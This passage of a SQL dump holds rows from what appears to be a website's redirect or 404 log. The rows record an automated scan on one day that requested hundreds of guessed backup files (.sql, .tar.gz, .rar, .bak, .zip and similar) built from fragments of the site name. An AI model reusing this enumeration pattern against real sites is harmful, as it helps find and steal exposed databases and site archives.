00:00:00',301),(22747,'https://ekvatorprint.com.ua/o.gz',NULL,'','',2,0,'2022-03-23 11:25:20','0000-00-00 00:00:00',301),(22748,'https://ekvatorprint.com.ua/om.sql',NULL,'','',1,0,'2022-03-23 11:25:24','0000-00-00 00:00:00',301),(22749,'https://ekvatorprint.com.ua/om.tar',NULL,'','',1,0,'2022-03-23 11:25:24','0000-00-00 00:00:00',301),(22750,'https://ekvatorprint.com.ua/om.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:24','0000-00-00 00:00:00',301),(22751,'https://ekvatorprint.com.ua/om.bz2',NULL,'','',1,0,'2022-03-23 11:25:25','0000-00-00 00:00:00',301),(22752,'https://ekvatorprint.com.ua/om.rar',NULL,'','',2,0,'2022-03-23 11:25:25','0000-00-00 00:00:00',301),(22753,'https://ekvatorprint.com.ua/om.bak',NULL,'','',1,0,'2022-03-23 11:25:25','0000-00-00 00:00:00',301),(22754,'https://ekvatorprint.com.ua/om.zip',NULL,'','',1,0,'2022-03-23 11:25:25','0000-00-00 00:00:00',301),(22755,'https://ekvatorprint.com.ua/om.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:26','0000-00-00 00:00:00',301),(22756,'https://ekvatorprint.com.ua/om.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:26','0000-00-00 00:00:00',301),(22757,'https://ekvatorprint.com.ua/om.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:26','0000-00-00 00:00:00',301),(22758,'https://ekvatorprint.com.ua/om.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:26','0000-00-00 00:00:00',301),(22759,'https://ekvatorprint.com.ua/om.7z',NULL,'','',1,0,'2022-03-23 11:25:27','0000-00-00 00:00:00',301),(22760,'https://ekvatorprint.com.ua/om.gz',NULL,'','',1,0,'2022-03-23 11:25:27','0000-00-00 00:00:00',301),(22761,'https://ekvatorprint.com.ua/or.sql',NULL,'','',1,0,'2022-03-23 11:25:27','0000-00-00 00:00:00',301),(22762,'https://ekvatorprint.com.ua/or.tar',NULL,'','',1,0,'2022-03-23 11:25:28','0000-00-00 00:00:00',301),(22763,'https://ekvatorprint.com.ua/or.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:28','0000-00-00 00:00:00',301),(22764,'https://ekvatorprint.com.ua/or.bz2',NULL,'','',1,0,'2022-03-23 11:25:28','0000-00-00 00:00:00',301),(22765,'https://ekvatorprint.com.ua/or.rar',NULL,'','',2,0,'2022-03-23 11:25:28','0000-00-00 00:00:00',301),(22766,'https://ekvatorprint.com.ua/or.bak',NULL,'','',1,0,'2022-03-23 11:25:29','0000-00-00 00:00:00',301),(22767,'https://ekvatorprint.com.ua/or.zip',NULL,'','',1,0,'2022-03-23 11:25:29','0000-00-00 00:00:00',301),(22768,'https://ekvatorprint.com.ua/or.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:29','0000-00-00 00:00:00',301),(22769,'https://ekvatorprint.com.ua/or.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:29','0000-00-00 00:00:00',301),(22770,'https://ekvatorprint.com.ua/or.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:30','0000-00-00 00:00:00',301),(22771,'https://ekvatorprint.com.ua/or.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:30','0000-00-00 00:00:00',301),(22772,'https://ekvatorprint.com.ua/or.7z',NULL,'','',1,0,'2022-03-23 11:25:31','0000-00-00 00:00:00',301),(22773,'https://ekvatorprint.com.ua/or.gz',NULL,'','',1,0,'2022-03-23 11:25:31','0000-00-00 00:00:00',301),(22774,'https://ekvatorprint.com.ua/p.sql',NULL,'','',1,0,'2022-03-23 11:25:31','0000-00-00 00:00:00',301),(22775,'https://ekvatorprint.com.ua/p.tar',NULL,'','',1,0,'2022-03-23 11:25:39','0000-00-00 00:00:00',301),(22776,'https://ekvatorprint.com.ua/p.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:39','0000-00-00 00:00:00',301),(22777,'https://ekvatorprint.com.ua/p.bz2',NULL,'','',1,0,'2022-03-23 11:25:39','0000-00-00 00:00:00',301),(22778,'https://ekvatorprint.com.ua/p.rar',NULL,'','',2,0,'2022-03-23 11:25:39','0000-00-00 00:00:00',301),(22779,'https://ekvatorprint.com.ua/p.bak',NULL,'','',1,0,'2022-03-23 11:25:40','0000-00-00 00:00:00',301),(22780,'https://ekvatorprint.com.ua/p.zip',NULL,'','',1,0,'2022-03-23 11:25:40','0000-00-00 00:00:00',301),(22781,'https://ekvatorprint.com.ua/p.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:40','0000-00-00 00:00:00',301),(22782,'https://ekvatorprint.com.ua/p.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:40','0000-00-00 00:00:00',301),(22783,'https://ekvatorprint.com.ua/p.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:40','0000-00-00 00:00:00',301),(22784,'https://ekvatorprint.com.ua/p.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:41','0000-00-00 00:00:00',301),(22785,'https://ekvatorprint.com.ua/p.7z',NULL,'','',1,0,'2022-03-23 11:25:41','0000-00-00 00:00:00',301),(22786,'https://ekvatorprint.com.ua/p.gz',NULL,'','',1,0,'2022-03-23 11:25:41','0000-00-00 00:00:00',301),(22787,'https://ekvatorprint.com.ua/pr.sql',NULL,'','',1,0,'2022-03-23 11:25:42','0000-00-00 00:00:00',301),(22788,'https://ekvatorprint.com.ua/pr.tar',NULL,'','',1,0,'2022-03-23 11:25:42','0000-00-00 00:00:00',301),(22789,'https://ekvatorprint.com.ua/pr.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:42','0000-00-00 00:00:00',301),(22790,'https://ekvatorprint.com.ua/pr.bz2',NULL,'','',1,0,'2022-03-23 11:25:42','0000-00-00 00:00:00',301),(22791,'https://ekvatorprint.com.ua/pr.rar',NULL,'','',2,0,'2022-03-23 11:25:43','0000-00-00 00:00:00',301),(22792,'https://ekvatorprint.com.ua/pr.bak',NULL,'','',1,0,'2022-03-23 11:25:43','0000-00-00 00:00:00',301),(22793,'https://ekvatorprint.com.ua/pr.zip',NULL,'','',1,0,'2022-03-23 11:25:43','0000-00-00 00:00:00',301),(22794,'https://ekvatorprint.com.ua/pr.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:43','0000-00-00 00:00:00',301),(22795,'https://ekvatorprint.com.ua/pr.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:44','0000-00-00 00:00:00',301),(22796,'https://ekvatorprint.com.ua/pr.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:44','0000-00-00 00:00:00',301),(22797,'https://ekvatorprint.com.ua/pr.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:44','0000-00-00 00:00:00',301),(22798,'https://ekvatorprint.com.ua/pr.7z',NULL,'','',1,0,'2022-03-23 11:25:45','0000-00-00 00:00:00',301),(22799,'https://ekvatorprint.com.ua/pr.gz',NULL,'','',1,0,'2022-03-23 11:25:45','0000-00-00 00:00:00',301),(22800,'https://ekvatorprint.com.ua/pri.sql',NULL,'','',1,0,'2022-03-23 11:25:45','0000-00-00 00:00:00',301),(22801,'https://ekvatorprint.com.ua/pri.tar',NULL,'','',1,0,'2022-03-23 11:25:45','0000-00-00 00:00:00',301),(22802,'https://ekvatorprint.com.ua/pri.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:46','0000-00-00 00:00:00',301),(22803,'https://ekvatorprint.com.ua/pri.bz2',NULL,'','',1,0,'2022-03-23 11:25:46','0000-00-00 00:00:00',301),(22804,'https://ekvatorprint.com.ua/pri.rar',NULL,'','',2,0,'2022-03-23 11:25:46','0000-00-00 00:00:00',301),(22805,'https://ekvatorprint.com.ua/pri.bak',NULL,'','',1,0,'2022-03-23 11:25:46','0000-00-00 00:00:00',301),(22806,'https://ekvatorprint.com.ua/pri.zip',NULL,'','',1,0,'2022-03-23 11:25:47','0000-00-00 00:00:00',301),(22807,'https://ekvatorprint.com.ua/pri.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:47','0000-00-00 00:00:00',301),(22808,'https://ekvatorprint.com.ua/pri.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:47','0000-00-00 00:00:00',301),(22809,'https://ekvatorprint.com.ua/pri.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:47','0000-00-00 00:00:00',301),(22810,'https://ekvatorprint.com.ua/pri.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:47','0000-00-00 00:00:00',301),(22811,'https://ekvatorprint.com.ua/pri.7z',NULL,'','',1,0,'2022-03-23 11:25:48','0000-00-00 00:00:00',301),(22812,'https://ekvatorprint.com.ua/pri.gz',NULL,'','',1,0,'2022-03-23 11:25:48','0000-00-00 00:00:00',301),(22813,'https://ekvatorprint.com.ua/prin.sql',NULL,'','',1,0,'2022-03-23 11:25:48','0000-00-00 00:00:00',301),(22814,'https://ekvatorprint.com.ua/prin.tar',NULL,'','',1,0,'2022-03-23 11:25:49','0000-00-00 00:00:00',301),(22815,'https://ekvatorprint.com.ua/prin.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:49','0000-00-00 00:00:00',301),(22816,'https://ekvatorprint.com.ua/prin.bz2',NULL,'','',1,0,'2022-03-23 11:25:49','0000-00-00 00:00:00',301),(22817,'https://ekvatorprint.com.ua/prin.rar',NULL,'','',2,0,'2022-03-23 11:25:49','0000-00-00 00:00:00',301),(22818,'https://ekvatorprint.com.ua/prin.bak',NULL,'','',1,0,'2022-03-23 11:25:50','0000-00-00 00:00:00',301),(22819,'https://ekvatorprint.com.ua/prin.zip',NULL,'','',1,0,'2022-03-23 11:25:50','0000-00-00 00:00:00',301),(22820,'https://ekvatorprint.com.ua/prin.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:50','0000-00-00 00:00:00',301),(22821,'https://ekvatorprint.com.ua/prin.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:50','0000-00-00 00:00:00',301),(22822,'https://ekvatorprint.com.ua/prin.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:51','0000-00-00 00:00:00',301),(22823,'https://ekvatorprint.com.ua/prin.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:51','0000-00-00 00:00:00',301),(22824,'https://ekvatorprint.com.ua/prin.7z',NULL,'','',1,0,'2022-03-23 11:25:51','0000-00-00 00:00:00',301),(22825,'https://ekvatorprint.com.ua/prin.gz',NULL,'','',1,0,'2022-03-23 11:25:52','0000-00-00 00:00:00',301),(22826,'https://ekvatorprint.com.ua/print.sql',NULL,'','',1,0,'2022-03-23 11:25:52','0000-00-00 00:00:00',301),(22827,'https://ekvatorprint.com.ua/print.tar',NULL,'','',1,0,'2022-03-23 11:25:52','0000-00-00 00:00:00',301),(22828,'https://ekvatorprint.com.ua/print.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:52','0000-00-00 00:00:00',301),(22829,'https://ekvatorprint.com.ua/print.bz2',NULL,'','',1,0,'2022-03-23 11:25:53','0000-00-00 00:00:00',301),(22830,'https://ekvatorprint.com.ua/print.rar',NULL,'','',2,0,'2022-03-23 11:25:53','0000-00-00 00:00:00',301),(22831,'https://ekvatorprint.com.ua/print.bak',NULL,'','',1,0,'2022-03-23 11:25:53','0000-00-00 00:00:00',301),(22832,'https://ekvatorprint.com.ua/print.zip',NULL,'','',1,0,'2022-03-23 11:25:53','0000-00-00 00:00:00',301),(22833,'https://ekvatorprint.com.ua/print.sql.gz',NULL,'','',1,0,'2022-03-23 11:25:54','0000-00-00 00:00:00',301),(22834,'https://ekvatorprint.com.ua/print.sql.zip',NULL,'','',1,0,'2022-03-23 11:25:54','0000-00-00 00:00:00',301),(22835,'https://ekvatorprint.com.ua/print.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:25:54','0000-00-00 00:00:00',301),(22836,'https://ekvatorprint.com.ua/print.sql.tar',NULL,'','',1,0,'2022-03-23 11:25:54','0000-00-00 00:00:00',301),(22837,'https://ekvatorprint.com.ua/print.7z',NULL,'','',1,0,'2022-03-23 11:25:55','0000-00-00 00:00:00',301),(22838,'https://ekvatorprint.com.ua/print.gz',NULL,'','',1,0,'2022-03-23 11:25:55','0000-00-00 00:00:00',301),(22839,'https://ekvatorprint.com.ua/ps.sql',NULL,'','',2,0,'2022-03-23 11:25:55','0000-00-00 00:00:00',301),(22840,'https://ekvatorprint.com.ua/ps.tar',NULL,'','',2,0,'2022-03-23 11:25:56','0000-00-00 00:00:00',301),(22841,'https://ekvatorprint.com.ua/ps.tar.gz',NULL,'','',2,0,'2022-03-23 11:25:56','0000-00-00 00:00:00',301),(22842,'https://ekvatorprint.com.ua/ps.bz2',NULL,'','',2,0,'2022-03-23 11:25:56','0000-00-00 00:00:00',301),(22843,'https://ekvatorprint.com.ua/ps.rar',NULL,'','',4,0,'2022-03-23 11:25:57','0000-00-00 00:00:00',301),(22844,'https://ekvatorprint.com.ua/ps.bak',NULL,'','',2,0,'2022-03-23 11:25:57','0000-00-00 00:00:00',301),(22845,'https://ekvatorprint.com.ua/ps.zip',NULL,'','',2,0,'2022-03-23 11:25:57','0000-00-00 00:00:00',301),(22846,'https://ekvatorprint.com.ua/ps.sql.gz',NULL,'','',2,0,'2022-03-23 11:25:57','0000-00-00 00:00:00',301),(22847,'https://ekvatorprint.com.ua/ps.sql.zip',NULL,'','',2,0,'2022-03-23 11:25:58','0000-00-00 00:00:00',301),(22848,'https://ekvatorprint.com.ua/ps.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:25:58','0000-00-00 00:00:00',301),(22849,'https://ekvatorprint.com.ua/ps.sql.tar',NULL,'','',2,0,'2022-03-23 11:25:58','0000-00-00 00:00:00',301),(22850,'https://ekvatorprint.com.ua/ps.7z',NULL,'','',2,0,'2022-03-23 11:25:59','0000-00-00 00:00:00',301),(22851,'https://ekvatorprint.com.ua/ps.gz',NULL,'','',2,0,'2022-03-23 11:25:59','0000-00-00 00:00:00',301),(22852,'https://ekvatorprint.com.ua/r.sql',NULL,'','',1,0,'2022-03-23 11:26:03','0000-00-00 00:00:00',301),(22853,'https://ekvatorprint.com.ua/r.tar',NULL,'','',1,0,'2022-03-23 11:26:03','0000-00-00 00:00:00',301),(22854,'https://ekvatorprint.com.ua/r.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:04','0000-00-00 00:00:00',301),(22855,'https://ekvatorprint.com.ua/r.bz2',NULL,'','',1,0,'2022-03-23 11:26:04','0000-00-00 00:00:00',301),(22856,'https://ekvatorprint.com.ua/r.rar',NULL,'','',2,0,'2022-03-23 11:26:04','0000-00-00 00:00:00',301),(22857,'https://ekvatorprint.com.ua/r.bak',NULL,'','',1,0,'2022-03-23 11:26:05','0000-00-00 00:00:00',301),(22858,'https://ekvatorprint.com.ua/r.zip',NULL,'','',1,0,'2022-03-23 11:26:05','0000-00-00 00:00:00',301),(22859,'https://ekvatorprint.com.ua/r.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:05','0000-00-00 00:00:00',301),(22860,'https://ekvatorprint.com.ua/r.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:05','0000-00-00 00:00:00',301),(22861,'https://ekvatorprint.com.ua/r.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:06','0000-00-00 00:00:00',301),(22862,'https://ekvatorprint.com.ua/r.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:06','0000-00-00 00:00:00',301),(22863,'https://ekvatorprint.com.ua/r.7z',NULL,'','',1,0,'2022-03-23 11:26:06','0000-00-00 00:00:00',301),(22864,'https://ekvatorprint.com.ua/r.gz',NULL,'','',1,0,'2022-03-23 11:26:07','0000-00-00 00:00:00',301),(22865,'https://ekvatorprint.com.ua/ri.sql',NULL,'','',1,0,'2022-03-23 11:26:07','0000-00-00 00:00:00',301),(22866,'https://ekvatorprint.com.ua/ri.tar',NULL,'','',1,0,'2022-03-23 11:26:07','0000-00-00 00:00:00',301),(22867,'https://ekvatorprint.com.ua/ri.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:07','0000-00-00 00:00:00',301),(22868,'https://ekvatorprint.com.ua/ri.bz2',NULL,'','',1,0,'2022-03-23 11:26:08','0000-00-00 00:00:00',301),(22869,'https://ekvatorprint.com.ua/ri.rar',NULL,'','',2,0,'2022-03-23 11:26:08','0000-00-00 00:00:00',301),(22870,'https://ekvatorprint.com.ua/ri.bak',NULL,'','',1,0,'2022-03-23 11:26:08','0000-00-00 00:00:00',301),(22871,'https://ekvatorprint.com.ua/ri.zip',NULL,'','',1,0,'2022-03-23 11:26:08','0000-00-00 00:00:00',301),(22872,'https://ekvatorprint.com.ua/ri.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:09','0000-00-00 00:00:00',301),(22873,'https://ekvatorprint.com.ua/ri.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:09','0000-00-00 00:00:00',301),(22874,'https://ekvatorprint.com.ua/ri.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:09','0000-00-00 00:00:00',301),(22875,'https://ekvatorprint.com.ua/ri.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:09','0000-00-00 00:00:00',301),(22876,'https://ekvatorprint.com.ua/ri.7z',NULL,'','',1,0,'2022-03-23 11:26:10','0000-00-00 00:00:00',301),(22877,'https://ekvatorprint.com.ua/ri.gz',NULL,'','',1,0,'2022-03-23 11:26:10','0000-00-00 00:00:00',301),(22878,'https://ekvatorprint.com.ua/rin.sql',NULL,'','',1,0,'2022-03-23 11:26:10','0000-00-00 00:00:00',301),(22879,'https://ekvatorprint.com.ua/rin.tar',NULL,'','',1,0,'2022-03-23 11:26:11','0000-00-00 00:00:00',301),(22880,'https://ekvatorprint.com.ua/rin.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:11','0000-00-00 00:00:00',301),(22881,'https://ekvatorprint.com.ua/rin.bz2',NULL,'','',1,0,'2022-03-23 11:26:11','0000-00-00 00:00:00',301),(22882,'https://ekvatorprint.com.ua/rin.rar',NULL,'','',2,0,'2022-03-23 11:26:11','0000-00-00 00:00:00',301),(22883,'https://ekvatorprint.com.ua/rin.bak',NULL,'','',1,0,'2022-03-23 11:26:12','0000-00-00 00:00:00',301),(22884,'https://ekvatorprint.com.ua/rin.zip',NULL,'','',1,0,'2022-03-23 11:26:12','0000-00-00 00:00:00',301),(22885,'https://ekvatorprint.com.ua/rin.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:12','0000-00-00 00:00:00',301),(22886,'https://ekvatorprint.com.ua/rin.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:12','0000-00-00 00:00:00',301),(22887,'https://ekvatorprint.com.ua/rin.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:13','0000-00-00 00:00:00',301),(22888,'https://ekvatorprint.com.ua/rin.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:13','0000-00-00 00:00:00',301),(22889,'https://ekvatorprint.com.ua/rin.7z',NULL,'','',1,0,'2022-03-23 11:26:13','0000-00-00 00:00:00',301),(22890,'https://ekvatorprint.com.ua/rin.gz',NULL,'','',1,0,'2022-03-23 11:26:14','0000-00-00 00:00:00',301),(22891,'https://ekvatorprint.com.ua/rp.sql',NULL,'','',1,0,'2022-03-23 11:26:14','0000-00-00 00:00:00',301),(22892,'https://ekvatorprint.com.ua/rp.tar',NULL,'','',1,0,'2022-03-23 11:26:14','0000-00-00 00:00:00',301),(22893,'https://ekvatorprint.com.ua/rp.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:14','0000-00-00 00:00:00',301),(22894,'https://ekvatorprint.com.ua/rp.bz2',NULL,'','',1,0,'2022-03-23 11:26:15','0000-00-00 00:00:00',301),(22895,'https://ekvatorprint.com.ua/rp.rar',NULL,'','',2,0,'2022-03-23 11:26:15','0000-00-00 00:00:00',301),(22896,'https://ekvatorprint.com.ua/rp.bak',NULL,'','',1,0,'2022-03-23 11:26:15','0000-00-00 00:00:00',301),(22897,'https://ekvatorprint.com.ua/rp.zip',NULL,'','',1,0,'2022-03-23 11:26:15','0000-00-00 00:00:00',301),(22898,'https://ekvatorprint.com.ua/rp.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:16','0000-00-00 00:00:00',301),(22899,'https://ekvatorprint.com.ua/rp.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:16','0000-00-00 00:00:00',301),(22900,'https://ekvatorprint.com.ua/rp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:16','0000-00-00 00:00:00',301),(22901,'https://ekvatorprint.com.ua/rp.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:16','0000-00-00 00:00:00',301),(22902,'https://ekvatorprint.com.ua/rp.7z',NULL,'','',1,0,'2022-03-23 11:26:17','0000-00-00 00:00:00',301),(22903,'https://ekvatorprint.com.ua/rp.gz',NULL,'','',1,0,'2022-03-23 11:26:17','0000-00-00 00:00:00',301),(22904,'https://ekvatorprint.com.ua/s.sql',NULL,'','',2,0,'2022-03-23 11:26:17','0000-00-00 00:00:00',301),(22905,'https://ekvatorprint.com.ua/s.tar',NULL,'','',2,0,'2022-03-23 11:26:18','0000-00-00 00:00:00',301),(22906,'https://ekvatorprint.com.ua/s.tar.gz',NULL,'','',2,0,'2022-03-23 11:26:18','0000-00-00 00:00:00',301),(22907,'https://ekvatorprint.com.ua/s.bz2',NULL,'','',2,0,'2022-03-23 11:26:18','0000-00-00 00:00:00',301),(22908,'https://ekvatorprint.com.ua/s.rar',NULL,'','',4,0,'2022-03-23 11:26:18','0000-00-00 00:00:00',301),(22909,'https://ekvatorprint.com.ua/s.bak',NULL,'','',2,0,'2022-03-23 11:26:19','0000-00-00 00:00:00',301),(22910,'https://ekvatorprint.com.ua/s.zip',NULL,'','',2,0,'2022-03-23 11:26:19','0000-00-00 00:00:00',301),(22911,'https://ekvatorprint.com.ua/s.sql.gz',NULL,'','',2,0,'2022-03-23 11:26:19','0000-00-00 00:00:00',301),(22912,'https://ekvatorprint.com.ua/s.sql.zip',NULL,'','',2,0,'2022-03-23 11:26:19','0000-00-00 00:00:00',301),(22913,'https://ekvatorprint.com.ua/s.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:26:20','0000-00-00 00:00:00',301),(22914,'https://ekvatorprint.com.ua/s.sql.tar',NULL,'','',2,0,'2022-03-23 11:26:20','0000-00-00 00:00:00',301),(22915,'https://ekvatorprint.com.ua/s.7z',NULL,'','',2,0,'2022-03-23 11:26:20','0000-00-00 00:00:00',301),(22916,'https://ekvatorprint.com.ua/s.gz',NULL,'','',2,0,'2022-03-23 11:26:21','0000-00-00 00:00:00',301),(22917,'https://ekvatorprint.com.ua/t.sql',NULL,'','',3,0,'2022-03-23 11:26:24','0000-00-00 00:00:00',301),(22918,'https://ekvatorprint.com.ua/t.tar',NULL,'','',3,0,'2022-03-23 11:26:25','0000-00-00 00:00:00',301),(22919,'https://ekvatorprint.com.ua/t.tar.gz',NULL,'','',3,0,'2022-03-23 11:26:25','0000-00-00 00:00:00',301),(22920,'https://ekvatorprint.com.ua/t.bz2',NULL,'','',3,0,'2022-03-23 11:26:25','0000-00-00 00:00:00',301),(22921,'https://ekvatorprint.com.ua/t.rar',NULL,'','',6,0,'2022-03-23 11:26:25','0000-00-00 00:00:00',301),(22922,'https://ekvatorprint.com.ua/t.bak',NULL,'','',3,0,'2022-03-23 11:26:26','0000-00-00 00:00:00',301),(22923,'https://ekvatorprint.com.ua/t.zip',NULL,'','',3,0,'2022-03-23 11:26:26','0000-00-00 00:00:00',301),(22924,'https://ekvatorprint.com.ua/t.sql.gz',NULL,'','',3,0,'2022-03-23 11:26:26','0000-00-00 00:00:00',301),(22925,'https://ekvatorprint.com.ua/t.sql.zip',NULL,'','',3,0,'2022-03-23 11:26:26','0000-00-00 00:00:00',301),(22926,'https://ekvatorprint.com.ua/t.sql.tar.gz',NULL,'','',3,0,'2022-03-23 11:26:26','0000-00-00 00:00:00',301),(22927,'https://ekvatorprint.com.ua/t.sql.tar',NULL,'','',3,0,'2022-03-23 11:26:27','0000-00-00 00:00:00',301),(22928,'https://ekvatorprint.com.ua/t.7z',NULL,'','',3,0,'2022-03-23 11:26:27','0000-00-00 00:00:00',301),(22929,'https://ekvatorprint.com.ua/t.gz',NULL,'','',3,0,'2022-03-23 11:26:28','0000-00-00 00:00:00',301),(22930,'https://ekvatorprint.com.ua/to.sql',NULL,'','',2,0,'2022-03-23 11:26:35','0000-00-00 00:00:00',301),(22931,'https://ekvatorprint.com.ua/to.tar',NULL,'','',2,0,'2022-03-23 11:26:35','0000-00-00 00:00:00',301),(22932,'https://ekvatorprint.com.ua/to.tar.gz',NULL,'','',2,0,'2022-03-23 11:26:35','0000-00-00 00:00:00',301),(22933,'https://ekvatorprint.com.ua/to.bz2',NULL,'','',2,0,'2022-03-23 11:26:36','0000-00-00 00:00:00',301),(22934,'https://ekvatorprint.com.ua/to.rar',NULL,'','',4,0,'2022-03-23 11:26:36','0000-00-00 00:00:00',301),(22935,'https://ekvatorprint.com.ua/to.bak',NULL,'','',2,0,'2022-03-23 11:26:36','0000-00-00 00:00:00',301),(22936,'https://ekvatorprint.com.ua/to.zip',NULL,'','',2,0,'2022-03-23 11:26:36','0000-00-00 00:00:00',301),(22937,'https://ekvatorprint.com.ua/to.sql.gz',NULL,'','',2,0,'2022-03-23 11:26:37','0000-00-00 00:00:00',301),(22938,'https://ekvatorprint.com.ua/to.sql.zip',NULL,'','',2,0,'2022-03-23 11:26:37','0000-00-00 00:00:00',301),(22939,'https://ekvatorprint.com.ua/to.sql.tar.gz',NULL,'','',2,0,'2022-03-23 11:26:37','0000-00-00 00:00:00',301),(22940,'https://ekvatorprint.com.ua/to.sql.tar',NULL,'','',2,0,'2022-03-23 11:26:37','0000-00-00 00:00:00',301),(22941,'https://ekvatorprint.com.ua/to.7z',NULL,'','',2,0,'2022-03-23 11:26:38','0000-00-00 00:00:00',301),(22942,'https://ekvatorprint.com.ua/to.gz',NULL,'','',2,0,'2022-03-23 11:26:38','0000-00-00 00:00:00',301),(22943,'https://ekvatorprint.com.ua/tor.sql',NULL,'','',1,0,'2022-03-23 11:26:42','0000-00-00 00:00:00',301),(22944,'https://ekvatorprint.com.ua/tor.tar',NULL,'','',1,0,'2022-03-23 11:26:42','0000-00-00 00:00:00',301),(22945,'https://ekvatorprint.com.ua/tor.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:42','0000-00-00 00:00:00',301),(22946,'https://ekvatorprint.com.ua/tor.bz2',NULL,'','',1,0,'2022-03-23 11:26:43','0000-00-00 00:00:00',301),(22947,'https://ekvatorprint.com.ua/tor.rar',NULL,'','',2,0,'2022-03-23 11:26:43','0000-00-00 00:00:00',301),(22948,'https://ekvatorprint.com.ua/tor.bak',NULL,'','',1,0,'2022-03-23 11:26:43','0000-00-00 00:00:00',301),(22949,'https://ekvatorprint.com.ua/tor.zip',NULL,'','',1,0,'2022-03-23 11:26:43','0000-00-00 00:00:00',301),(22950,'https://ekvatorprint.com.ua/tor.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:44','0000-00-00 00:00:00',301),(22951,'https://ekvatorprint.com.ua/tor.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:44','0000-00-00 00:00:00',301),(22952,'https://ekvatorprint.com.ua/tor.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:44','0000-00-00 00:00:00',301),(22953,'https://ekvatorprint.com.ua/tor.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:44','0000-00-00 00:00:00',301),(22954,'https://ekvatorprint.com.ua/tor.7z',NULL,'','',1,0,'2022-03-23 11:26:45','0000-00-00 00:00:00',301),(22955,'https://ekvatorprint.com.ua/tor.gz',NULL,'','',1,0,'2022-03-23 11:26:45','0000-00-00 00:00:00',301),(22956,'https://ekvatorprint.com.ua/torp.sql',NULL,'','',1,0,'2022-03-23 11:26:45','0000-00-00 00:00:00',301),(22957,'https://ekvatorprint.com.ua/torp.tar',NULL,'','',1,0,'2022-03-23 11:26:46','0000-00-00 00:00:00',301),(22958,'https://ekvatorprint.com.ua/torp.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:46','0000-00-00 00:00:00',301),(22959,'https://ekvatorprint.com.ua/torp.bz2',NULL,'','',1,0,'2022-03-23 11:26:46','0000-00-00 00:00:00',301),(22960,'https://ekvatorprint.com.ua/torp.rar',NULL,'','',2,0,'2022-03-23 11:26:46','0000-00-00 00:00:00',301),(22961,'https://ekvatorprint.com.ua/torp.bak',NULL,'','',1,0,'2022-03-23 11:26:47','0000-00-00 00:00:00',301),(22962,'https://ekvatorprint.com.ua/torp.zip',NULL,'','',1,0,'2022-03-23 11:26:47','0000-00-00 00:00:00',301),(22963,'https://ekvatorprint.com.ua/torp.sql.gz',NULL,'','',1,0,'2022-03-23 11:26:47','0000-00-00 00:00:00',301),(22964,'https://ekvatorprint.com.ua/torp.sql.zip',NULL,'','',1,0,'2022-03-23 11:26:47','0000-00-00 00:00:00',301),(22965,'https://ekvatorprint.com.ua/torp.sql.tar.gz',NULL,'','',1,0,'2022-03-23 11:26:48','0000-00-00 00:00:00',301),(22966,'https://ekvatorprint.com.ua/torp.sql.tar',NULL,'','',1,0,'2022-03-23 11:26:48','0000-00-00 00:00:00',301),(22967,'https://ekvatorprint.com.ua/torp.7z',NULL,'','',1,0,'2022-03-23 11:26:48','0000-00-00 00:00:00',301),(22968,'https://ekvatorprint.com.ua/torp.gz',NULL,'','',1,0,'2022-03-23 11:26:49','0000-00-00 00:00:00',301),(22969,'https://ekvatorprint.com.ua/tp.sql',NULL,'','',1,0,'2022-03-23 11:26:49','0000-00-00 00:00:00',301),(22970,'https://ekvatorprint.com.ua/tp.tar',NULL,'','',1,0,'2022-03-23 